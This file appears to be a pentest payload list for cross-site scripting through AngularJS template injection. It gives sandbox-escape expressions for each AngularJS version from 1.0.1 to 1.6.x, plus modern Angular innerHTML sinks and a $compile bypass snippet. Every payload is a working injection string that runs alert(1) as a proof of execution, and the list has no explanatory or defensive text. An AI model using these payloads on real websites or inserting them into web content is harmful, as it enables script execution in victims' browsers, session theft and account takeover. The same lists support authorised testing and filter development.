# Angular XSS — template injection via $scope, ng-* directives
# AngularJS 1.x (sandbox escape)
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{[].pop.constructor('alert(1)')()}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
# AngularJS 1.x - version specific sandbox escapes
# v1.0.1 - v1.1.5
{{{}.__proto__.valueOf=valueOf.constructor('alert(1)');[].valueOf()}}
# v1.2.x
{{'a'[{toString:[].join,length:1,0:'__proto__'}].valueOf=toString.constructor.prototype.call;[].valueOf()}}
# v1.3.x
{{!ready && (ready = true) && (
  !call
  ? $$watchers[0].fn($$watchers[0].fn, [], $$watchers[0].fn)
  : (a = apply) &&
    (apply = constructor) &&
    (valueOf = call) &&
    (''+''.toString(
      'F = Function.prototype.call.call;F(F,F,F,F,F,alert,1)'
    ))
);}}
# v1.4.x
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!document.body.hasAttribute(\"e\")){document.body.setAttribute(\"e\",\"\");alert(1)}')+eval(y)+\"'");}}
# v1.5.x-v1.5.8
{{x = {'y': '', 'constructor': constructor}; x['y'].constructor('\''+ x + '\'')}}
# v1.6.x
{{constructor.constructor('alert(1)')()}}
# Angular (modern, component-level injection if $sce bypassed)
<div [innerHTML]="'<img src=x onerror=alert(1)>'"></div>
<div [innerHtml]="userInput"></div>
# ng-app bypass
<script>angular.element(document).injector().get('$compile')('<img src=x onerror=alert(1)>')(angular.element(document).scope()).$apply()</script>
